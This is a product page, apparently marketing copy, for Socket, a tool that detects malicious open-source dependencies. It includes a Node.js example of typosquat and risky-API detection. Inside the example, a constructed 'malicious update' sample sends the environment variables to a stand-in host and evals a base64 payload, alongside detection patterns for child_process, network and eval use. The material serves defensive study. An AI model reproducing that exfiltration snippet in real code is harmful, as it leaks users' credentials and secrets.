
Why We Built Socket

Open source code makes up as much as 90% of a typical codebase, so managing those dependencies effectively is critical to reducing your organization's security risk.

Socket detects what vulnerability scanners can’t

It's 2022 and it's no longer sufficient to scan for known vulnerabilities (CVEs) and stop there. And yet, that's what the leading "supply chain security" products do, leaving you vulnerable.

It can take weeks or months for a CVE to be discovered, reported, and picked up by scanning tools. But in today's culture of fast development, a malicious dependency can be updated, merged, and running in production within days, or sometimes hours.

Defenders need a new approach to address emerging threats from malicious dependencies:

  • Maintainer intentionally added malware – Rogue maintainer sabotaged his own open source package with 100M downloads/month, affecting companies such as Amazon AWS

  • Package hijacked and poisoned with cryptominers and password-stealing malware – Deliberate malware introduced into multiple packages with 30M downloads/month each

  • Package hijacked to add backdoor targeting a specific organization – Obfuscated malware added to a dependency which targeted a single company, went undetected for over a week, and made it into their production build

  • NPM package manager allowed anyone to publish new versions of any package – Attackers could publish new versions of any NPM package without authorization for multiple years

Using third-party dependencies without proper vetting leaves you open to hacking, breaches, and assorted security misfortune.

The Socket approach: best-in-class malware detection and blocking

Security teams depend on Socket to prevent malicious open source dependencies from infiltrating their apps.

Socket dramatically improves your open source security posture by detecting and blocking the attacks you don't expect – malware, hidden code, typo-squatting, and more – which aren't caught by CVE vulnerability scanners.

  • Block typosquats – Block malicious packages that differ in name by only a few characters, and recommend the correct package

  • Block malware – Block emerging malware threats

  • Detect hidden code – Detect obfuscated, minified, or hidden code

  • Detect privileged API usage – Detect usage of risky APIs – filesystem, network, child_process, environment variables, eval()

  • Detect suspicious updates – Detect updates that significantly change package behavior
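To make the typosquat, privileged-API and suspicious-update signals above concrete, here is an added example in plain Node.js. It is not Socket's code and does not show how Socket implements these checks; the "popular package" list, the package names and the two source samples are constructed for illustration, and the regex-based matching is deliberately simple.

```javascript
// Added example, not Socket's code: three of the signals listed above, in
// plain Node.js. Package names, the "popular" list and the source samples are
// constructed for illustration.

// Constructed stand-in for a popularity list (in practice this would be derived
// from registry download counts).
const POPULAR_PACKAGES = ['lodash', 'express', 'chalk', 'commander', 'debug', 'minimist'];

// Levenshtein edit distance, computed with a single rolling row.
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];          // dp[i-1][j-1] for the current j
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];     // dp[i-1][j]
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Typosquat check: a name that is not itself popular but sits within
// maxDistance edits of a popular name is flagged, with the likely intended
// package as the suggestion. Returns null when the name looks legitimate.
function checkTyposquat(name, popular = POPULAR_PACKAGES, maxDistance = 2) {
  if (popular.includes(name)) return null;
  let best = null;
  for (const candidate of popular) {
    const distance = editDistance(name, candidate);
    if (distance <= maxDistance && (best === null || distance < best.distance)) {
      best = { suspect: name, suggested: candidate, distance };
    }
  }
  return best;
}

// Privileged API usage: map imported core modules and a few dangerous globals
// to the categories named above. CommonJS require() and ESM import specifiers
// are both matched, with or without the "node:" prefix.
const MODULE_CATEGORIES = {
  child_process: 'child_process',
  fs: 'filesystem', 'fs/promises': 'filesystem',
  net: 'network', http: 'network', https: 'network', dns: 'network',
};
const MODULE_IMPORT = /(?:\brequire\(\s*|\bfrom\s+)['"](?:node:)?([\w/]+)['"]/g;
const GLOBAL_PATTERNS = [
  { category: 'environment', pattern: /\bprocess\.env\b/ },
  { category: 'eval', pattern: /\beval\s*\(|\bnew\s+Function\s*\(/ },
];

function detectRiskyApis(source) {
  const hits = [];
  source.split('\n').forEach((text, idx) => {
    for (const m of text.matchAll(MODULE_IMPORT)) {
      const category = MODULE_CATEGORIES[m[1]];
      if (category) hits.push({ category, line: idx + 1, text: text.trim() });
    }
    for (const { category, pattern } of GLOBAL_PATTERNS) {
      if (pattern.test(text)) hits.push({ category, line: idx + 1, text: text.trim() });
    }
  });
  return hits;
}

// Suspicious update: capability categories present in the new version that the
// previous version never used. A pure string helper that suddenly reaches for
// the network and the environment is the shape of the incidents listed above.
function newCapabilities(previousSource, currentSource) {
  const before = new Set(detectRiskyApis(previousSource).map((h) => h.category));
  const after = new Set(detectRiskyApis(currentSource).map((h) => h.category));
  return [...after].filter((c) => !before.has(c)).sort();
}

// Constructed sources: a benign v1 and a v2 that adds an exfiltration routine.
// Neither is executed; they are only scanned as text.
const V1_SOURCE = `
module.exports = function leftPad(s, n) { return String(s).padStart(n); };
`;
const V2_SOURCE = `
const { execSync } = require('child_process');
const https = require('https');
module.exports = function leftPad(s, n) { return String(s).padStart(n); };
const payload = Buffer.from(JSON.stringify(process.env)).toString('base64');
https.request({ hostname: 'example.invalid', method: 'POST' }).end(payload);
eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());
`;

console.log(JSON.stringify({
  typosquat: checkTyposquat('expresss'),
  riskyApis: detectRiskyApis(V2_SOURCE),
  newCapabilities: newCapabilities(V1_SOURCE, V2_SOURCE),
}, null, 2));
```

Two caveats a practitioner should keep in mind. Edit distance alone produces false positives for legitimately similar names, so a real check also weighs the suspect's age and download count against the suggestion's. More importantly, textual matching like this is trivially evaded by `require('child' + '_process')`, dynamic specifiers or minified bundles, which is exactly why the hidden-code detection listed above matters: a package that is obfuscated has removed the analyst's ability to see what APIs it reaches for, and that absence of visibility is itself the signal.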

Empower developers to take charge of their dependency health

Socket improves security outcomes and reduces work for security teams by surfacing actionable security information directly inline in GitHub so developers are empowered to make better decisions.

  • Five-minute deployment – The easiest security product you'll ever deploy in your organization. Just install a GitHub app and you're done.

  • Provide security feedback directly on PRs – Empower developers to solve security issues before they're deployed into production.

  • Automated security – Spend security team resources auditing the highest-impact dependencies, instead of choosing between auditing everything and auditing nothing.

Interested?

Install our free GitHub App or get in touch at [email protected] for a demo.
